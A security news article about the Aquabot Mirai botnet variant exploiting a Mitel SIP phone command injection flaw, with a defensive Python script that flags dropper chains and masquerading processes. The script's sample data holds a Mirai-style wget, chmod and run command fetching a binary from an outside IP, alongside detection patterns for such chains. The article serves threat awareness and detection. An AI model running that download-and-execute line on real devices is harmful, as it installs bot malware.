Aquabot Botnet Exploits Mitel Phones Vulnerability for DDoS Attacks

A new Mirai botnet variant, dubbed Aquabot, has been observed exploiting a medium-severity command injection vulnerability, CVE-2024-41710, in Mitel SIP phones to build a distributed denial-of-service (DDoS) network. The flaw affects the Mitel 6800 and 6900 series SIP phones and the 6970 Conference Unit, putting organizations that expose these devices at risk. Mitel patched the issue in July 2024 and a proof-of-concept (PoC) exploit was published in August 2024; active exploitation attempts have been observed since January 2025.

Exploitation of Multiple Vulnerabilities

Targeting a Range of Devices

Aquabot does not limit itself to Mitel phones. It also targets older, known vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137 and CVE-2023-26801, as well as a remote code execution flaw in Linksys E-series devices. Targeting such a broad set of products points to a deliberate effort to compromise as many internet-connected devices as possible, and any unpatched device in that set is a candidate for enrollment in the botnet.

Once a device is compromised, Aquabot uses a shell script and "wget" commands to fetch and run a binary built for the victim's CPU architecture, so a single campaign can cover the mix of processors found in IoT devices. A distinctive feature of this variant is its "report_kill" function: when the bot catches a kill signal on the infected device, it reports that event to its command-and-control (C2) server. The server sends no response, so the exact purpose of the report is not yet clear, but it appears designed to improve the botnet's survivability. The operators could use these signals to refine the malware's stealth or to detect and displace competing botnets that try to terminate it.

Evolution of Aquabot

Akamai researchers, who documented the campaign, first observed Aquabot in November 2023 and have tracked successive refinements to its structure and behavior since. The current variant renames its process to "httpd.x86" to blend in with legitimate services on the infected device, and it terminates processes such as local shells, which suggests an effort to evade detection and reflects a broader trend toward stealthier Mirai derivatives. Static indicators alone are therefore not enough; defenders need to watch process and network behavior on these devices as well.
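The two behaviors described above, a download-and-execute dropper chain that pulls an architecture-specific binary with wget, and a bot process that hides under a service-like name such as "httpd.x86", both leave traces a host-side check can pick up. The script below is an added example, not code from Akamai or from the Aquabot samples: it scores shell command lines for a Mirai-style fetch, chmod, run chain in a world-writable directory, and flags process records whose name borrows a service name while the executable lives in /tmp, has been unlinked, or carries an architecture suffix. The architecture list, the service names, the sample shell lines and the sample process records are all constructed for the example; the field names mirror what /proc/<pid>/comm and /proc/<pid>/exe would give you on a real device.

```python
"""Added example: heuristics for Mirai-family dropper chains and process
masquerading, run against constructed sample data so it works offline."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Architecture suffixes Mirai-family droppers commonly append to their binaries.
# Assumed list for this example, longest first so the regex alternation is safe.
ARCH_TOKENS = ("x86_64", "mipsel", "sparc", "m68k", "arm7", "arm6", "arm5",
               "mips", "x86", "arm", "ppc", "sh4")
ARCH_RE = re.compile(r"[./](?:%s)\b" % "|".join(map(re.escape, ARCH_TOKENS)))

# Pieces of a typical download-and-execute chain.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
WORLD_WRITABLE_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)(?=/|\s|;|$)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")

# Service names a bot borrows to look legitimate (assumed for the example).
SERVICE_NAMES = ("httpd", "sshd", "telnetd", "busybox", "dropbear")


def score_dropper_line(line: str) -> int:
    """Return 0-4: how many dropper-chain traits a shell command line shows."""
    score = 0
    if FETCH_RE.search(line):           # fetches something from the network
        score += 1
    if WORLD_WRITABLE_RE.search(line):  # stages it in a world-writable dir
        score += 1
    if CHMOD_RE.search(line):           # marks the download executable
        score += 1
    if ARCH_RE.search(line):            # binary named after a CPU architecture
        score += 1
    return score


@dataclass
class ProcRecord:
    pid: int
    comm: str      # as /proc/<pid>/comm reports it
    exe: str       # as /proc/<pid>/exe resolves (with " (deleted)" if unlinked)
    cmdline: str


def masquerade_reasons(p: ProcRecord) -> List[str]:
    """List the reasons a process looks like a bot hiding behind a service name."""
    reasons: List[str] = []
    base = p.comm.split(".")[0]
    looks_like_service = base in SERVICE_NAMES
    if looks_like_service and WORLD_WRITABLE_RE.search(p.exe):
        reasons.append("service-named process running from a world-writable dir")
    if p.exe.endswith("(deleted)"):
        reasons.append("executable was unlinked after launch")
    if looks_like_service and any(p.comm.endswith("." + t) for t in ARCH_TOKENS):
        reasons.append("service name carries an architecture suffix")
    return reasons


# Constructed sample input: one Mirai-style chain, one benign update, one noise line.
SAMPLE_SHELL_LINES = [
    "cd /tmp; wget http://203.0.113.5/bins/x86; chmod +x x86; ./x86 mitel",
    "wget -O /var/www/update.tar.gz https://updates.example/update.tar.gz",
    "ls -la /etc",
]

# Constructed process records: a masquerading bot, a real httpd, a shell.
SAMPLE_PROCS = [
    ProcRecord(1234, "httpd.x86", "/tmp/x86 (deleted)", "httpd.x86"),
    ProcRecord(567, "httpd", "/usr/sbin/httpd", "/usr/sbin/httpd -k start"),
    ProcRecord(890, "sh", "/bin/busybox", "sh"),
]


def triage(lines: List[str], procs: List[ProcRecord], threshold: int = 3) -> Dict[str, list]:
    """Return suspicious shell lines (score >= threshold) and suspicious processes."""
    return {
        "dropper_lines": [l for l in lines if score_dropper_line(l) >= threshold],
        "masquerading_pids": [p.pid for p in procs if masquerade_reasons(p)],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_SHELL_LINES, SAMPLE_PROCS)
    for line in result["dropper_lines"]:
        print("dropper chain:", line)
    for p in SAMPLE_PROCS:
        for reason in masquerade_reasons(p):
            print(f"pid {p.pid} ({p.comm}): {reason}")
```

On a real device you would feed score_dropper_line the lines from shell history, audit logs or an exploit-attempt capture, and build ProcRecord entries by walking /proc; the threshold of three traits keeps a legitimate wget of an update package from being flagged while the full fetch, stage, chmod, run chain still is.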

Threat Actors and Misleading Claims

Alleged DDoS Services on Telegram

Akamai also found evidence that the operators behind Aquabot offer DDoS-for-hire services on Telegram under several aliases, including Cursinq Firewall, The Eye Services and The Eye Botnet. The use of multiple brand names points to an organized effort to monetize the botnet's capacity. Operators in this market openly advertise their botnets and boast about attacks, which both attracts customers and recruits additional participants to expand the operation.

These listings follow a familiar pattern: botnets are marketed as tools for "educational" use or DDoS mitigation testing, while in practice they are used to conduct and sell DDoS attacks. Such claims should be treated with skepticism, and they underline the need for better education on cybersecurity hygiene and on the consequences of misusing these tools.

Necessity for Enhanced Security Measures

Because Aquabot can affect such a wide range of devices, organizations need to harden the IoT equipment they expose. Default credentials, which Mirai-family botnets routinely try in order to take over devices, remain a widespread problem, as does unpatched firmware. Change default passwords, keep firmware current (for the affected Mitel phones, that means applying the fix Mitel released in July 2024 for CVE-2024-41710), and keep device management interfaces off the public internet, so devices cannot be co-opted into a botnet used for DDoS attacks.

Conclusion

Aquabot shows how quickly a published vulnerability in an internet-connected device becomes botnet fodder: Mitel patched CVE-2024-41710 in July 2024, a PoC exploit followed in August 2024, and exploitation attempts were observed from January 2025. Any organization running the affected 6800 or 6900 series phones or 6970 Conference Units should confirm that the fix is installed. More broadly, the continuous evolution of Mirai variants such as Aquabot highlights the need to stay current on security patches and to apply robust security measures across every exposed device.
